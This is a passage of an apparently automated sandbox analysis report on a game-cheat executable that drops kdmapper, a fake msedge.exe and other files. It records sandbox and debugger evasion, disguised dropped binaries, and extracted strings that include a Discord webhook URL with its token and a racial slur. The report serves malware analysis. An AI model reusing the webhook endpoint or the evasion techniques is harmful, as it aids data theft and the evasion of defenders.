Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Edge\msedge.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Idle.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: NCTSgL4t0B.exe	Binary or memory string: IMGUI_IMPL_DX9IMGUI_IMPL_WIN32#SCROLLX#SCROLLY[X][ ]-------------------------------- \|##COMBO_%02DUNKNOWN ITEM%I64U%LF%.*S%%D%SUNKNOWN EXCEPTIONBAD ARRAY NEW LENGTHSTRING TOO LONG: GENERICBAD CASTC\\.\ORQUR-ONTOP-FUCKING-NIGGERNPC][##RADARNTDLL.DLLNTQUERYINFORMATIONPROCESSISDEBUGGERPRESENTKERNEL32.DLLNTSETINFORMATIONTHREADOLLYDBG.EXEX64DBG.EXEIDA.EXEIDA64.EXEIMMUNITYDEBUGGER.EXEGHIDRA.EXEWINDBG.EXEOLLYDBGWINDBGFRAMECLASSIDAVW64IDAVW32DBGHELP.DLLDBGCORE.DLL: "", "EXISTSSUCCESSHTTPS://DISCORD.COM/API/WEBHOOKS/1247249666907701321/MHNII9J0YWG308W-RJBT6RXKALF0IFLJIGI4SGWLEDUFWWOFGLNFE9ULMGNRQPPHDYLKHTTPS://AUTH.GG/HEADNECKCHESTRANDOMLEFT MOUSERIGHT MOUSEMIDDLE MOUSEMOUSE 5MOUSE 4BACKSPACEENTERSHIFTCONTROLALTPAUSECAPSESCAPESPACEPAGE UPPAGE DOWNENDHOMELEFTUPRIGHTDOWNPRINTINSERTDELETE046789DEFGHIJKLMNOPQRSTUVWNUMPAD 0NUMPAD 1NUMPAD 2NUMPAD 3NUMPAD 4NUMPAD 5NUMPAD 6NUMPAD 7NUMPAD 8NUMPAD 9MULTIPLYADDSUBTRACTDECIMALDIVIDEF1F2F3F4F5F6F7F8F9F10F11F12SELECT KEYPRESS KEYC:\WINDOWS\FONTS\IMPACT.TTFFORTNITEWINVERSHOTGUNORQUR PUBLIC
Source: NCTSgL4t0B.exe	Binary or memory string: OLLYDBG.EXE
Source: NCTSgL4t0B.exe	Binary or memory string: X64DBG.EXE
Source: NCTSgL4t0B.exe	Binary or memory string: WINDBG.EXE

Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 14B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 2F40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Speech\physmeme.exe	Memory allocated: 2D70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Edge\msedge.exe	Memory allocated: 860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Edge\msedge.exe	Memory allocated: 1A5D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Idle.exe	Memory allocated: DA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Idle.exe	Memory allocated: 1A900000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Idle.exe	Memory allocated: 13D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Idle.exe	Memory allocated: 1AF0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: D30000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1AB50000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1730000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1B150000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 18C0000 memory reserve \| memory write watch
Source: C:\Edge\msedge.exe	Memory allocated: 1B440000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Idle.exe	Memory allocated: 2460000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Idle.exe	Memory allocated: 1A6D0000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

0_2_00007FF735DD4BF0

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Idle.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7824
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7113

Source: C:\Users\user\AppData\Local\Idle.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NDQNJGxB.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LUAEjdyP.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\AwpzIjFt.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\MsCvKimq.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YtKLaCEq.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\dgcKDzTe.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NohnZlpE.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iZOTduyR.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\tGwZoaKl.log	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\pGvBroyE.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\sharmiXk.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Idle.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\LAdenXtG.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\YlsMudWZ.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WjFdZuSe.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CQuHWLcS.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\onyQOgMn.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BlhoAAti.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\aUzlTMCV.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\iyHbCGSC.log	Jump to dropped file
Source: C:\Edge\msedge.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PDYwKARr.log	Jump to dropped file

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-15765

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

API coverage: 7.2 %

Source: C:\Windows\Speech\physmeme.exe TID: 7308	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7324	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Edge\msedge.exe TID: 7596	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8136	Thread sleep count: 7824 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7296	Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3284	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132	Thread sleep count: 7113 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7300	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2172	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Idle.exe TID: 4016	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Idle.exe TID: 7292	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 5664	Thread sleep time: -30000s >= -30000s
Source: C:\Edge\msedge.exe TID: 7280	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 7260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Edge\msedge.exe TID: 1624	Thread sleep time: -30000s >= -30000s
Source: C:\Edge\msedge.exe TID: 2196	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Idle.exe TID: 3380	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Idle.exe TID: 1532	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Idle.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Idle.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Edge\msedge.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Idle.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Code function: 0_2_00007FF735DEBAEC GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,GetFileInformationByHandleEx,GetLastError,CloseHandle,abort,CloseHandle,CloseHandle,abort,	0_2_00007FF735DEBAEC
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DEA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	12_2_00DEA69B
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00DFC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	12_2_00DFC220
Source: C:\Windows\Speech\kdmapper.exe	Code function: 12_2_00E0B348 FindFirstFileExA,	12_2_00E0B348

Source: C:\Windows\Speech\kdmapper.exe

Code function: 12_2_00DFE6A3 VirtualQuery,GetSystemInfo,

12_2_00DFE6A3

Source: C:\Windows\Speech\physmeme.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Idle.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Edge\msedge.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Idle.exe	Thread delayed: delay time: 922337203685477

Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Edge\msedge.exe	File opened: C:\Users\user
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\AppData
Source: C:\Edge\msedge.exe	File opened: C:\Users\user\Desktop\desktop.ini

Source: Idle.exe, 00000036.00000002.1807636497.000000001AEB0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv
Source: kdmapper.exe, 0000000C.00000003.1312368420.0000000000C31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
Source: msedge.exe, 00000031.00000002.1782893319.000000001BE10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
Source: wscript.exe, 00000010.00000002.1468871356.000000000359E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Idle.exe, 00000036.00000002.1787812286.000000001277A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: aZCk2yFi0E+h+uGMQNydYHGLIGKQMsCGQgik4K+mGPVI/2wp4GjjDbBvIuAHLAMQz1mF4ZtgI5BsiGa6tHkL0jZB+MclcSnpWQkqUzmrTsDkNMGYO4xuw1WPADcFeIgawj050fSDTy/wAfZTSyzTAwqwZsDhgfSDbqGuLkVyCco7T+6SCO/du+dPbpzo+XzU8kLzFV8yUH+/afF5F6MhuCbYH8gxHtVhYaJ7hWC8UyjPsk1/FB/CUQtiNCFX4Q0XRDMDuQ7RQZlIhXDITHI2OBRC5O8IWt1RYbVYUMxOqzZgL1DERlAKKWpijFRQ42gqhPBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]]
Source: msedge.exe, 0000002A.00000002.1867281661.0000000002D53000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: PBvybJBDwRyoUSHlozJAx+QV8BDtk5+HR4lQwiADqGLARyF8nYC0UA0FuEE/FgPQBmkzHJM3goDVzagJJfizfMovWqCmG+2Tt4JKgAqwsFhJIfpORYHkyXsAgwyOjTYmOib/1bHRMfld2c2qHZP/JsqF+W6zUOjYWA3sjdAVUJ2fmWT75JNYZXjgp6DwUKz8CVkt0FrUApUUqqqsbgEU3W+ffNrKREg4ZJ/8M1d+HMq0zyKNxwumCpk8LvI834U8+cyMeRS8FSyqhJUIilt0RKvN1WboAAUutyiWsGLkS8hVoHGSUFhVKIN8tVm06IMsyY7SArcJylldyDkKdR2MPFaeEBHPUSTZPkuSqyW0ABxWQW9LOfRcIRQnOboVx4VVMCiFjm78daFjs8LlIlZmUhTHZqgEYFC4I4IpImSDdMURsUCNHVscERn7IgJCEm+JqDAJ8gGL5PpJD2hxdEEO0RGnHJBfARLVbiGxzWhtChrjFkdcRvurNmNOR0Q3SNERARGZo11U6GaFHgp0h12DVpotur2LcpUoi6KsQMIq2pOa0H9MuA010V+kk6shzRGBezPccbi3oGFC7WUrJMqibIa8O9E6JgEZRuRzgFxmkh2T16C1VyF2PXWmiOg+HKIq8C3AbyZ2IaL7YQDRzRC/HeyMfA3wO9BKw4jdrbhNhVXkREB9B6qBvgfofThGhD0A+kSOPghMhbCfoIZWxB6Doh1tvLxfQrqN6vYEStoQ+w2UoGRLOKAI+l+2rMHXs12i83xYKNbkhDsQYsKEL4BcP8kBcsqlI1UmHVluJC0hxGIBf7vCMe7AMQDrKyysLlT4JDTbkl8koENM3g//C8EbwKckdEnykUfAC8stliJBF+CcahL7rtkigVeYLEKRIFkEBe4q2SIVCeBBWOCHjqjFYgIS2obsaqVagSxV0FcW6MYSixVK7oeW21ehQYG1Rc0WEeRlyL3AscBqkRU0zsJCi0VytAEGySDO2GRm6iTjNuNvl37KdX3mdE7PslR6eT/sJyEQpf10IlEf7+c9eaqWuZd8uqL/loufHZXrf2U1l4/27/8UPl74IiYCKY8JUymPCfii6jzWyXoAttHbyna2lq0Bup2+ZFhLco+Y3j7J9QjTdC7WKTSX0/8sq5tEOmFFxZV3ENbgFfDENbsdqD6Gf1zgnyTpz/4LsaX0O4sq0CawZbSiD0COQdBiDMHcnLQhPM1lo1DTKMkZl5dkVgFnK63/XVAHvnYPwDMN6/rUgHJ964CbAokRiihO1+f5FJnzpkckOeW2UvyBZfVC2aNgVJ8my13rPKrPJ3sG64W9yms+CHn74Tk8TcN9uQdx/3v9/3wN8W+G7mv4n67I/17/E9f/AW/nhxgAXAAA","35d8f50be9ce23718b03ad282906cdb3fa75f62d"]2i
Source: kdmapper.exe, 0000000C.00000002.1314407676.0000000000C31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: RegAsm.exe, 00000013.00000002.1364981690.0000000000E46000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365221723.0000000000EA3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000013.00000002.1365221723.0000000000E98000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: msedge.exe, 0000002A.00000002.1821903588.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}X
Source: curl.exe, 0000000E.00000003.1325345916.000001EBAEA13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: curl.exe, 0000000A.00000003.1304898793.0000013FD8193000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000003.1304965327.0000013FD8196000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000A.00000002.1305291488.0000013FD8196000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000002A.00000002.1821903588.0000000000E0B000.00000004.00000020.00020000.00000000.sdmp, w32tm.exe, 0000002F.00000002.1596146161.000002190FEE8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: msedge.exe, 00000031.00000002.1782893319.000000001BEF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\Speech\kdmapper.exe

API call chain: ExitProcess graph end node

graph_12-25059

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe

0_2_00007FF735DD4BF0

Hides threads from debuggers

Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Desktop\NCTSgL4t0B.exe	Thread information set: HideFromDebugger	Jump to behavior
